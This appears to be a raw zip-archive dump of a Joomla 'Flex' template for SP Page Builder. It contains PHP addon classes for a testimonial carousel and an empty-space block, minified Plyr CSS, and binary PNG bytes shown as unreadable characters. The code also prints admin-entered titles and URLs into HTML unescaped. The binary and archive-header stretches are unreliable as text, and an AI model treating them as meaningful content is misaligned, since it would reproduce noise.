 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonTestimonialflex extends SppagebuilderAddons {

	public function render() {
		
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$style = (isset($this->addon->settings->style) && $this->addon->settings->style) ? $this->addon->settings->style : '';

		//Options
		$autoplay = (isset($this->addon->settings->autoplay) && $this->addon->settings->autoplay) ? ' data-sppb-ride="sppb-carousel"' : '';
		$arrows = (isset($this->addon->settings->arrows) && $this->addon->settings->arrows) ? $this->addon->settings->arrows : '';
		
		$autoplay_interval = (isset($this->addon->settings->autoplay_interval) && $this->addon->settings->autoplay_interval) ? ((int) $this->addon->settings->autoplay_interval) : 5000;
		
		$avatar_size = (isset($this->addon->settings->avatar_size) && $this->addon->settings->avatar_size) ? $this->addon->settings->avatar_size : '120';

		
		$carousel_autoplay = ($autoplay) ? 'data-sppb-ride="sppb-carousel"' : '';
		$carousel_autoplay_interval = ($autoplay) ? ' data-interval="'.$autoplay_interval.'"' : '';
	
		$output  = '<div class="sppb-carousel sppb-testimonial-flex sppb-slide ' . $class . ' sppb-text-center" ' . $carousel_autoplay . $carousel_autoplay_interval .'>';
		
		$output .= '<div class="sppb-carousel-inner">';

		foreach ($this->addon->settings->sp_testimonialflex_item as $key => $value) {
			//$avatar = (isset($this->addon->settings->avatar) && $this->addon->settings->avatar) ? $this->addon->settings->avatar : '';
			
			//$client_img = (isset($value->image) && $value->image) ? $value->image : '';
			//$client_img_src = isset($client_img->src) ? $client_img->src : $client_img;
				
				
			$avatar = (isset($value->avatar) && $value->avatar) ? $value->avatar : '';
			$avatar_src = isset($avatar->src) ? $avatar->src : $avatar;
			
			
			
			
			$message = (isset($this->addon->settings->message) && $this->addon->settings->message) ? $this->addon->settings->message : '';
			$avatar_position = (isset($this->addon->settings->avatar_position) && $this->addon->settings->avatar_position) ? $this->addon->settings->avatar_position : 'left';
			$avatar_style = (isset($this->addon->settings->avatar_style) && $this->addon->settings->avatar_style) ? $this->addon->settings->avatar_style : '';
			$title = (isset($value->title) && $value->title) ? $value->title : '';
			$url = (isset($value->url) && $value->url) ? $value->url . '' : '';
			$link_target = (isset($value->link_target) && $value->link_target) ? $link_target = ' target="' . $value->link_target . '"' : '';
		
			$output   .= '<div class="sppb-item ' . (($key == 0) ? ' active' : '') .'">';
			
			$name = (isset($value->title) && $value->title) ? '<h4 class="pro-client-name">'. $value->title .'</h4>' : '';
			
			if($url) $name .= '<a' . $link_target . ' href="'.$url.'"><em class="pro-client-url">'. $url .'</em></a>';
			
			$output .= '<div class="sppb-media flex">';
			$output .= '<div class="pull-'.$value->avatar_position.'">';
			
			if($avatar_src) {
				//Lazyload image
				if(strpos($avatar_src, "http://") !== false || strpos($avatar_src, "https://") !== false){
					$avatar_src = $avatar_src;
				} else {
					$avatar_src = JURI::base(true) . '/' . $avatar_src;
				}
				
				if($has_lazyload) {
					$output .= '<img class="lazyload sppb-img-responsive sppb-avatar '. $value->avatar_style .'" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $avatar_src .'" height="' . $avatar_size . '" width="' . $avatar_size . '" alt="'. $value->title .'">';
				} else {
					$output .= '<img src="'.$avatar_src.'" height="' . $avatar_size . '" width="' . $avatar_size . '" class="sppb-img-responsive sppb-avatar '. $value->avatar_style .'" alt="'.$value->title.'">';	
				}
			}
			$output .= '</div>';
			
			$output .= '<div style="text-align:'.$value->avatar_position.'" class="sppb-media-body">';
			if($class == 'flex') $output .= '<i class="fas fa-quote-left"></i>';
			$output .= $value->message;
			if($class == 'flex') $output .= '<i class="fas fa-quote-right"></i>';
			if($title) $output .= '<div class="sppb-testimonial-client">' . $name . '</div>';
			$output .= '</div>';
			
			$output .= '</div>';
			$output  .= '</div>';
		}
		
		$output	.= '</div>';
		
		if($arrows) {
			$output	.= '<a class="left sppb-carousel-control" role="button" data-slide="prev"><i class="fas fa-angle-left"></i></a>';
			$output	.= '<a class="right sppb-carousel-control" role="button" data-slide="next"><i class="fas fa-angle-right"></i></a>';
		}

		$output .= '</div>';

		return $output;

	}

	public function css() {
		$avatar = (isset($this->addon->settings->avatar) && $this->addon->settings->avatar) ? $this->addon->settings->avatar : '';
		$avatar_style = (isset($this->addon->settings->avatar_style) && $this->addon->settings->avatar_style) ? $this->addon->settings->avatar_style : '';
		$avatar_size = (isset($this->addon->settings->avatar_size) && $this->addon->settings->avatar_size) ? $this->addon->settings->avatar_size : '120';
		$avatar_border_radius = (isset($this->addon->settings->avatar_style) && $this->addon->settings->avatar_style) == 'sppb-img-circle' ? $avatar_border_radius = 'width:'. $avatar_size .'px;height:'. $avatar_size .'px;object-fit:cover;border-radius:'. $avatar_size .'px;' : $avatar_border_radius = '';
		
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$css = '';

		$css .= $addon_id.' .sppb-carousel-inner .sppb-media img.sppb-img-circle {width:'. $avatar_size .'px;height:'. $avatar_size .'px;object-fit:cover;border-radius:50%;}';
		
		return $css;
	}


	public static function getTemplate(){

		$output = '
			<#
				var autoplay = (data.autoplay) ? \' data-sppb-ride="sppb-carousel"\' : "";
				var interval = (data.autoplay_interval) ? \' data-interval="{{ data.autoplay_interval }}"\' :5000;
				
				var avatar_size = (data.avatar_size) ? data.avatar_size : "120";
			#>
			
			<div class="sppb-carousel sppb-testimonial-flex sppb-slide {{ data.class }} sppb-text-center" {{ autoplay }} {{ interval }}>
			
			<div class="sppb-carousel-inner">
			
				<# _.each(data.sp_testimonialflex_item, function(testimonial_item, key){
					
					var avatarSrc = {}
						if (typeof testimonial_item.avatar !== "undefined" && typeof testimonial_item.avatar.src !== "undefined") {
							avatarSrc = testimonial_item.avatar
						} else {
							avatarSrc = {src: testimonial_item.avatar}
						}
						
					var activeClass = (key == 0) ? " active" : ""; 
					#>
						<div class="sppb-item {{ activeClass }}">
							<div class="sppb-media flex">
								<div class="pull-{{ testimonial_item.avatar_position }}">
								
									<# if(avatarSrc.src && avatarSrc.src.indexOf("https://") == -1 && avatarSrc.src.indexOf("http://") == -1){ #>
										<img class="sppb-img-responsive sppb-avatar {{ testimonial_item.avatar_style }}" src=\'{{ pagebuilder_base + avatarSrc.src }}\' height="{{ avatar_size }}" width="{{ avatar_size }}" alt="{{ testimonial_item.title }}">
									<# } else if(avatarSrc.src){ #>
										<img class="sppb-img-responsive sppb-avatar {{ testimonial_item.avatar_style }}" src=\'{{ avatarSrc.src }}\' height="{{ avatar_size }}" width="{{ avatar_size }}" alt="{{ testimonial_item.title }}">
									<# } #>	
									
								</div>
								<div style="text-align:{{ testimonial_item.avatar_position }}" class="sppb-media-body">
									<# if(data.class == "flex") { #>
										<i class="fas fa-quote-left"></i>
									<# } #>
									{{ testimonial_item.message }}
									<# if(data.class == "flex") { #>
										<i class="fas fa-quote-right"></i>
									<# } #>
									<div class="sppb-testimonial-client">
										<h4 class="pro-client-name">{{ testimonial_item.title }}</h4>
										<# if(testimonial_item.url) { #>
											<a href="{{ testimonial_item.url }}"><em class="pro-client-url">{{ testimonial_item.url }}</em></a>
										<# } #>
									</div>
								</div>	
							</div>
						</div>
					<# }); #>
				</div>
				<# if(data.arrows) { #>
					<a class="left sppb-carousel-control" role="button" data-slide="prev"><i class="fas fa-angle-left"></i></a>
					<a class="right sppb-carousel-control" role="button" data-slide="next"><i class="fas fa-angle-right"></i></a>
				<# } #>
			</div>
			';

		return $output;
	}

}
PK!K��D	D	.flex/sppagebuilder/addons/empty_space/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonEmpty_space extends SppagebuilderAddons{

	public function render() {

		$class  = (isset($this->addon->settings->class) && $this->addon->settings->class) ? ' '. $this->addon->settings->class : '';

		return '<div class="sppb-empty-space' . $class . ' clearfix"></div>';
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$gap = (isset($this->addon->settings->gap) && $this->addon->settings->gap) ? 'height: ' . (int) $this->addon->settings->gap . 'px;': '';

		$css = '';
		if($gap) {
			$css .= $addon_id . ' .sppb-empty-space {';
			$css .= $gap;
			$css .= '}';
		}

		$gap_sm = (isset($this->addon->settings->gap_sm) && $this->addon->settings->gap_sm) ? 'height: ' . (int) $this->addon->settings->gap_sm . 'px;': '';
		if(!empty($gap_sm)){
			$css .= '@media (min-width: 768px) and (max-width: 991px) {';
			$css .= $addon_id . ' .sppb-empty-space {';
				$css .= $gap_sm;
			$css .= '}';
			$css .= '}';
		}

		$gap_xs = (isset($this->addon->settings->gap_xs) && $this->addon->settings->gap_xs) ? 'height: ' . (int) $this->addon->settings->gap_xs . 'px;': '';
		if(!empty($gap_xs)){
			$css .= '@media (max-width: 767px) {';
			$css .= $addon_id . ' .sppb-empty-space {';
				$css .= $gap_xs;
			$css .= '}';
			$css .= '}';
		}

		return $css;
	}

	public static function getTemplate(){
		$output = '
		<style type="text/css">
			#sppb-addon-{{ data.id }} .sppb-empty-space {
				<# if(_.isObject(data.gap)){ #>
					height: {{ data.gap.md }}px;
				<# } else { #>
					height: {{ data.gap }}px;
				<# } #>
			}

			@media (min-width: 768px) and (max-width: 991px) {
				#sppb-addon-{{ data.id }} .sppb-empty-space {
					<# if(_.isObject(data.gap)){ #>
						height: {{ data.gap.sm }}px;
					<# } #>
				}
			}
			@media (max-width: 767px) {
				#sppb-addon-{{ data.id }} .sppb-empty-space {
					<# if(_.isObject(data.gap)){ #>
						height: {{ data.gap.xs }}px;
					<# } #>
				}
			}
		</style>
		<div class="sppb-empty-space sppb-empty-space-edit {{ data.class }} clearfix"></div>
		';

		return $output;
	}

}PK!���/flex/sppagebuilder/addons/empty_space/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'empty_space',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_EMPTY_SPACE'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_EMPTY_SPACE_DESC'),
		'category'=>'General',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'gap'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_EMPTY_SPACE_GAP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_EMPTY_SPACE_GAP_DESC'),
					'min'=>5,
					'max'=>400,
					'std'=>array('md'=>40, 'sm'=>30, 'xs'=>20),
					'responsive'=>true
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);PK!&��	�	5flex/sppagebuilder/addons/plyr/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<#iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:3C84AD3B347F11E6867CFBEB32D99137" xmpMM:DocumentID="xmp.did:3C84AD3C347F11E6867CFBEB32D99137"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3C84AD39347F11E6867CFBEB32D99137" stRef:documentID="xmp.did:3C84AD3A347F11E6867CFBEB32D99137"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>A�·gIDATx��klSeǟs���:��p�h�I�b Q�`L��b��E�'D��!��D?�1��HH�.�p B�J�.0Aֱ{��]{|���i�K���.�<ɻ���s�>��y���۸��n�����Va[�<�j����8�Cn���
��`ے~�O{�ve;	߮$|�@'�N�p��%|u�خ��!lOj	^h�J���k�6�N����X��4n:�@���t:�@�&>�/QbQ��V�z���[p�v�M�/�1���s����;�	���=p�Vh�c�p(�>V�˄��c�fN��ʋaǺ9��;
y�3��"����)��N�ç�P��L2T�K�尰����p�3_���/�||�x٨‰�K�r�l��kO���z�Dyr�Lv
Lps�v��	G�v#,�\*Y����z~K2/���ㅌ�Pf��kJ�a0�WՃ?±��T��'�\j�7����Gm�ee��¡���N����cIowf���x�bم.�/~nTT̲@�U��R�H?V���[.\o�{=��&Ԧ0���ea����n�z�Y��>���N���.[ƹ��^����_m!���
�yNvj]����
�%Ea�cS�[�^��?M�
���n���ޟ�4�ݶKAe� }����cg���A��GG#y�עX���~���-���)�M�:���D��̎�"�p�Nxt��-��`[�4�Ӡ���
N������O�@�u��~ش2f��Fr�K�_�I_���Ģ^~��̜<MP{��x��Ȣ���P]5g��~���}= ٦�4
RGy���P���W�k���|]
)�ʜ��~��D�E�>�BS7����<*k��E_3�w��?����rJ󶩧�ʦ@�k�����]���Ā
S�o��E@Ŷ�3:�FQ2��hőw�Y!�NP��vsp��,��Ҡ�q<[V�^s�w�}G�)�D5������YئR����x��DRk|~�l�B'�sYUQ��1O��&�EK��Hiy�)98_d��Ø��,�{nj�;��'�#��x� &I��^nl]Zo,��'�'`�r�s{�.�`Z��x8"8r'qӋ��ʙ�+<u�Hi�N�)1��~�O�*~�?Pv��;���mWg�@0��bJJO�*~����f�DFi7'�HW+[�FTz�t|��%���A���]���[�;VuS��'��gQ�t�U�����o���鸇�=�dw2=��8r���YRx-6���<1����܄�-m��5����iٴ�ŏ=C�Ne�K���4H����ڞ�;,�Ҡ�غ��1xj�ܳm��$įxX�#0yE�Xm�f�X֔�Q
��G=�Wp1#��c�f�@(���u�f����L�悉_�"X���E���8v�ZAk	*���'dкA��XEI�26)faSu�`�sXF�]�10�w�:�@��h�G�{@�������4B�?*�f�scR?Ҙx>��@����I��1p��'y:�I�ؑ����.M\�$#�'�Ӗ��'�~�,����IEND�B`�PK!�]���<�<2flex/sppagebuilder/addons/plyr/assets/css/plyr.cssnu&1i�@-webkit-keyframes plyr-progress{to{background-position:25px 0}}@keyframes plyr-progress{to{background-position:25px 0}}.plyr{position:relative;max-width:100%;min-width:200px;font-family:Avenir,'Avenir Next','Helvetica Neue','Segoe UI',Helvetica,Arial,sans-serif;direction:ltr}.plyr,.plyr *,.plyr ::after,.plyr ::before{-webkit-box-sizing:border-box;box-sizing:border-box}.plyr a,.plyr button,.plyr input,.plyr label{-ms-touch-action:manipulation;touch-action:manipulation}.plyr:focus{outline:0}.plyr audio,.plyr video{width:100%;height:auto;vertical-align:middle;border-radius:inherit}.plyr input[type=range]{display:block;height:20px;width:100%;margin:0;padding:0;-webkit-appearance:none;-moz-appearance:none;cursor:pointer;border:none;background:0 0}.plyr input[type=range]::-webkit-slider-runnable-track{height:8px;background:0 0;border:0;border-radius:4px;-webkit-user-select:none;user-select:none}.plyr input[type=range]::-webkit-slider-thumb{-webkit-appearance:none;margin-top:-4px;position:relative;height:16px;width:16px;background:#fff;border:2px solid transparent;border-radius:100%;-webkit-transition:background .2s ease,border .2s ease,-webkit-transform .2s ease;transition:background .2s ease,border .2s ease,-webkit-transform .2s ease;transition:background .2s ease,border .2s ease,transform .2s ease;transition:background .2s ease,border .2s ease,transform .2s ease,-webkit-transform .2s ease;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.15),0 0 0 1px rgba(0,0,0,.15);box-shadow:0 1px 1px rgba(0,0,0,.15),0 0 0 1px rgba(0,0,0,.15);-webkit-box-sizing:border-box;box-sizing:border-box}.plyr input[type=range]::-moz-range-track{height:8px;background:0 0;border:0;border-radius:4px;-moz-user-select:none;user-select:none}.plyr input[type=range]::-moz-range-thumb{position:relative;height:16px;width:16px;background:#fff;border:2px solid transparent;border-radius:100%;-webkit-transition:background .2s ease,border .2s ease,-webkit-transform .2s ease;transition:background .2s ease,border .2s ease,-webkit-transform .2s ease;transition:background .2s ease,border .2s ease,transform .2s ease;transition:background .2s ease,border .2s ease,transform .2s ease,-webkit-transform .2s ease;box-shadow:0 1px 1px rgba(0,0,0,.15),0 0 0 1px rgba(0,0,0,.15);box-sizing:border-box}.plyr input[type=range]::-ms-track{height:8px;background:0 0;border:0;color:transparent}.plyr input[type=range]::-ms-fill-upper{height:8px;background:0 0;border:0;border-radius:4px;-ms-user-select:none;user-select:none}.plyr input[type=range]::-ms-fill-lower{height:8px;background:0 0;border:0;border-radius:4px;-ms-user-select:none;user-select:none;background:#3498db}.plyr input[type=range]::-ms-thumb{position:relative;height:16px;width:16px;background:#fff;border:2px solid transparent;border-radius:100%;-webkit-transition:background .2s ease,border .2s ease,-webkit-transform .2s ease;transition:background .2s ease,border .2s ease,-webkit-transform .2s ease;transition:background .2s ease,border .2s ease,transform .2s ease;transition:background .2s ease,border .2s ease,transform .2s ease,-webkit-transform .2s ease;box-shadow:0 1px 1px rgba(0,0,0,.15),0 0 0 1px rgba(0,0,0,.15);box-sizing:border-box;margin-top:0}.plyr input[type=range]::-ms-tooltip{display:none}.plyr input[type=range]:focus{outline:0}.plyr input[type=range]::-moz-focus-outer{border:0}.plyr input[type=range].tab-focus:focus{outline-offset:3px}.plyr input[type=range]:active::-webkit-slider-thumb{background:#3498db;border-color:#fff;-webkit-transform:scale(1.25);transform:scale(1.25)}.plyr input[type=range]:active::-moz-range-thumb{background:#3498db;border-color:#fff;transform:scale(1.25)}.plyr input[type=range]:active::-ms-thumb{background:#3498db;border-color:#fff;transform:scale(1.25)}.plyr--video input[type=range].tab-focus:focus{outline:1px dotted rgba(255,255,255,.5)}.plyr--audio input[type=range].tab-focus:focus{outline:1px dotted rgba(86,93,100,.5)}.plyr__sr-only{clip:rect(1px,1px,1px,1px);overflow:hidden;position:absolute!important;padding:0!important;border:0!important;height:1px!important;width:1px!important}.plyr__video-wrapper{position:relative;background:#000;border-radius:inherit}.plyr__video-embed{padding-bottom:56.25%;height:0;border-radius:inherit;overflow:hidden;z-index:0}.plyr__video-embed iframe{position:absolute;top:0;left:0;width:100%;height:100%;border:0;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.plyr__video-embed>div{position:relative;padding-bottom:200%;-webkit-transform:translateY(-35.95%);transform:translateY(-35.95%)}.plyr .plyr__video-embed iframe{pointer-events:none}.plyr video::-webkit-media-text-track-container{display:none}.plyr__captions{display:none;position:absolute;bottom:0;left:0;width:100%;padding:20px;-webkit-transform:translateY(-40px);transform:translateY(-40px);-webkit-transition:-webkit-transform .3s ease;transition:-webkit-transform .3s ease;transition:transform .3s ease;transition:transform .3s ease,-webkit-transform .3s ease;color:#fff;font-size:16px;text-align:center;font-weight:400}.plyr__captions span{border-radius:2px;padding:3px 10px;background:rgba(0,0,0,.7);-webkit-box-decoration-break:clone;box-decoration-break:clone;line-height:150%}.plyr__captions span:empty{display:none}@media (min-width:768px){.plyr__captions{font-size:24px}}.plyr--captions-active .plyr__captions{display:block}.plyr--hide-controls .plyr__captions{-webkit-transform:translateY(-15px);transform:translateY(-15px)}@media (min-width:1024px){.plyr--fullscreen-active .plyr__captions{font-size:32px}}.plyr ::-webkit-media-controls{display:none}.plyr__controls{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;line-height:1;text-align:center;pointer-events:none}.plyr__controls>*{pointer-events:all}.plyr__controls .plyr__progress,.plyr__controls .plyr__time,.plyr__controls>button{margin-left:5px}.plyr__controls .plyr__progress:first-child,.plyr__controls .plyr__time:first-child,.plyr__controls>button:first-child{margin-left:0}.plyr__controls .plyr__volume{margin-left:5px}.plyr__controls [data-plyr=pause]{margin-left:0}.plyr__controls button{position:relative;display:inline-block;-ms-flex-negative:0;flex-shrink:0;overflow:visible;vertical-align:middle;padding:7px;border:0;background:0 0;border-radius:3px;cursor:pointer;-webkit-transition:background .3s ease,color .3s ease,opacity .3s ease;transition:background .3s ease,color .3s ease,opacity .3s ease;color:inherit}.plyr__controls button svg{width:18px;height:18px;display:block;fill:currentColor}.plyr__controls button:focus{outline:0}.plyr__controls .icon--captions-on,.plyr__controls .icon--exit-fullscreen,.plyr__controls .icon--muted{display:none}@media (min-width:480px){.plyr__controls .plyr__progress,.plyr__controls .plyr__time,.plyr__controls>button{margin-left:10px}}.plyr--hide-controls .plyr__controls{opacity:0;pointer-events:none}.plyr--video .plyr__controls{position:absolute;left:0;right:0;bottom:0;z-index:2;padding:50px 10px 10px;background:-webkit-gradient(linear,left top,left bottom,from(rgba(0,0,0,0)),to(rgba(0,0,0,.5)));background:linear-gradient(rgba(0,0,0,0),rgba(0,0,0,.5));border-bottom-left-radius:inherit;border-bottom-right-radius:inherit;color:#fff;-webkit-transition:opacity .3s ease;transition:opacity .3s ease}.plyr--video .plyr__controls button.tab-focus:focus,.plyr--video .plyr__controls button:hover{background:#3498db;color:#fff}.plyr--audio .plyr__controls{padding:10px;border-radius:inherit;background:#fff;border:1px solid #dbe3e8;color:#565d64}.plyr--audio .plyr__controls button.tab-focus:focus,.plyr--audio .plyr__controls button:hover{background:#3498db;color:#fff}.plyr__play-large{display:none;position:absolute;z-index:1;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);padding:10px;background:#3498db;border:4px solid currentColor;border-radius:100%;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.15);box-shadow:0 1px 1px rgba(0,0,0,.15);color:#fff;-webkit-transition:all .3s ease;transition:all .3s ease}.plyr__play-large svg{position:relative;left:2px;width:20px;height:20px;display:block;fill:currentColor}.plyr__play-large:focus{outline:1px dotted rgba(255,255,255,.5)}.plyr .plyr__play-large{display:inline-block}.plyr--audio .plyr__play-large{display:none}.plyr--playing .plyr__play-large{opacity:0;visibility:hidden}.plyr--playing .plyr__controls [data-plyr=play],.plyr__controls [data-plyr=pause]{display:none}.plyr--playing .plyr__controls [data-plyr=pause]{display:inline-block}.plyr--captions-active .plyr__controls .icon--captions-on,.plyr--fullscreen-active .icon--exit-fullscreen,.plyr--muted .plyr__controls .icon--muted{display:block}.plyr--captions-active .plyr__controls .icon--captions-on+svg,.plyr--fullscreen-active .icon--exit-fullscreen+svg,.plyr--muted .plyr__controls .icon--muted+svg{display:none}.plyr [data-plyr=captions],.plyr [data-plyr=fullscreen]{display:none}.plyr--captions-enabled [data-plyr=captions],.plyr--fullscreen-enabled [data-plyr=fullscreen]{display:inline-block}.plyr__tooltip{position:absolute;z-index:2;bottom:100%;margin-bottom:10px;padding:5px 7.5px;pointer-events:none;opacity:0;background:rgba(0,0,0,.7);border-radius:3px;color:#fff;font-size:14px;line-height:1.3;-webkit-transform:translate(-50%,10px) scale(.8);transform:translate(-50%,10px) scale(.8);-webkit-transform-origin:50% 100%;transform-origin:50% 100%;-webkit-transition:opacity .2s .1s ease,-webkit-transform .2s .1s ease;transition:opacity .2s .1s ease,-webkit-transform .2s .1s ease;transition:transform .2s .1s ease,opacity .2s .1s ease;transition:transform .2s .1s ease,opacity .2s .1s ease,-webkit-transform .2s .1s ease}.plyr__tooltip::before{content:'';position:absolute;width:0;height:0;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%);bottom:-4px;border-right:4px solid transparent;border-top:4px solid rgba(0,0,0,.7);border-left:4px solid transparent;z-index:2}.plyr button.tab-focus:focus .plyr__tooltip,.plyr button:hover .plyr__tooltip,.plyr__tooltip--visible{opacity:1;-webkit-transform:translate(-50%,0) scale(1);transform:translate(-50%,0) scale(1)}.plyr button:hover .plyr__tooltip{z-index:3}.plyr__controls button:first-child .plyr__tooltip{left:0;-webkit-transform:translate(0,10px) scale(.8);transform:translate(0,10px) scale(.8);-webkit-transform-origin:0 100%;transform-origin:0 100%}.plyr__controls button:first-child .plyr__tooltip::before{left:16px}.plyr__controls button:last-child .plyr__tooltip{right:0;-webkit-transform:translate(0,10px) scale(.8);transform:translate(0,10px) scale(.8);-webkit-transform-origin:100% 100%;transform-origin:100% 100%}.plyr__controls button:last-child .plyr__tooltip::before{left:auto;right:16px;-webkit-transform:translateX(50%);transform:translateX(50%)}.plyr__controls button:first-child .plyr__tooltip--visible,.plyr__controls button:first-child.tab-focus:focus .plyr__tooltip,.plyr__controls button:first-child:hover .plyr__tooltip,.plyr__controls button:last-child .plyr__tooltip--visible,.plyr__controls button:last-child.tab-focus:focus .plyr__tooltip,.plyr__controls button:last-child:hover .plyr__tooltip{-webkit-transform:translate(0,0) scale(1);transform:translate(0,0) scale(1)}.plyr__progress{position:relative;display:none;-webkit-box-flex:1;-ms-flex:1;flex:1}.plyr__progress input[type=range]{position:relative;z-index:2}.plyr__progress input[type=range]::-webkit-slider-runnable-track{background:0 0}.plyr__progress input[type=range]::-moz-range-track{background:0 0}.plyr__progress input[type=range]::-ms-fill-upper{background:0 0}.plyr__progress .plyr__tooltip{left:0}.plyr .plyr__progress{display:inline-block}.plyr__progress--buffer,.plyr__progress--played,.plyr__volume--display{position:absolute;left:0;top:50%;width:100%;height:8px;margin:-4px 0 0;padding:0;vertical-align:top;-webkit-appearance:none;-moz-appearance:none;border:none;border-radius:100px}.plyr__progress--buffer::-webkit-progress-bar,.plyr__progress--played::-webkit-progress-bar,.plyr__volume--display::-webkit-progress-bar{background:0 0}.plyr__progress--buffer::-webkit-progress-value,.plyr__progress--played::-webkit-progress-value,.plyr__volume--display::-webkit-progress-value{background:currentColor;border-radius:100px;min-width:8px}.plyr__progress--buffer::-moz-progress-bar,.plyr__progress--played::-moz-progress-bar,.plyr__volume--display::-moz-progress-bar{background:currentColor;border-radius:100px;min-width:8px}.plyr__progress--buffer::-ms-fill,.plyr__progress--played::-ms-fill,.plyr__volume--display::-ms-fill{border-radius:100px}.plyr__progress--played,.plyr__volume--display{z-index:1;color:#3498db;background:0 0;-webkit-transition:none;transition:none}.plyr__progress--played::-webkit-progress-value,.plyr__volume--display::-webkit-progress-value{min-width:8px;max-width:99%;border-top-right-radius:0;border-bottom-right-radius:0;-webkit-transition:none;transition:none}.plyr__progress--played::-moz-progress-bar,.plyr__volume--display::-moz-progress-bar{min-width:8px;max-width:99%;border-top-right-radius:0;border-bottom-right-radius:0;-webkit-transition:none;transition:none}.plyr__progress--played::-ms-fill,.plyr__volume--display::-ms-fill{display:none}.plyr__progress--buffer::-webkit-progress-value{-webkit-transition:width .2s ease;transition:width .2s ease}.plyr__progress--buffer::-moz-progress-bar{-webkit-transition:width .2s ease;transition:width .2s ease}.plyr__progress--buffer::-ms-fill{-webkit-transition:width .2s ease;transition:width .2s ease}.plyr--video .plyr__progress--buffer,.plyr--video .plyr__volume--display{background:rgba(255,255,255,.25)}.plyr--video .plyr__progress--buffer{color:rgba(255,255,255,.25)}.plyr--audio .plyr__progress--buffer,.plyr--audio .plyr__volume--display{background:rgba(198,214,219,.66)}.plyr--audio .plyr__progress--buffer{color:rgba(198,214,219,.66)}.plyr--loading .plyr__progress--buffer{-webkit-animation:plyr-progress 1s linear infinite;animation:plyr-progress 1s linear infinite;background-size:25px 25px;background-repeat:repeat-x;background-image:linear-gradient(-45deg,rgba(0,0,0,.15) 25%,transparent 25%,transparent 50%,rgba(0,0,0,.15) 50%,rgba(0,0,0,.15) 75%,transparent 75%,transparent);color:transparent}.plyr--video.plyr--loading .plyr__progress--buffer{background-color:rgba(255,255,255,.25)}.plyr--audio.plyr--loading .plyr__progress--buffer{background-color:rgba(198,214,219,.66)}.plyr__time{display:inline-block;vertical-align:middle;font-size:14px}.plyr__time+.plyr__time{display:none}@media (min-width:768px){.plyr__time+.plyr__time{display:inline-block}}.plyr__time+.plyr__time::before{content:'\2044';margin-right:10px}.plyr__volume{display:none}.plyr .plyr__volume{-webkit-box-flex:1;-ms-flex:1;flex:1;position:relative}.plyr .plyr__volume input[type=range]{position:relative;z-index:2}@media (min-width:480px){.plyr .plyr__volume{display:block;max-width:60px}}@media (min-width:768px){.plyr .plyr__volume{max-width:100px}}.plyr--is-ios .plyr__volume,.plyr--is-ios [data-plyr=mute]{display:none!important}.plyr--fullscreen-active{height:100%;width:100%;background:#000;border-radius:0!important}.plyr--fullscreen-active video{height:100%}.plyr--fullscreen-active .plyr__video-wrapper{height:100%;width:100%}.plyr--fullscreen-active .plyr__video-embed{overflow:visible}.plyr--fullscreen-active.plyr--vimeo .plyr__video-wrapper{height:0;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%)}.plyr--fullscreen-fallback.plyr--fullscreen-active{position:fixed;top:0;left:0;right:0;bottom:0;z-index:10000000}PK!V I���2flex/sppagebuilder/addons/plyr/assets/css/plyr.svgnu&1i�<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg 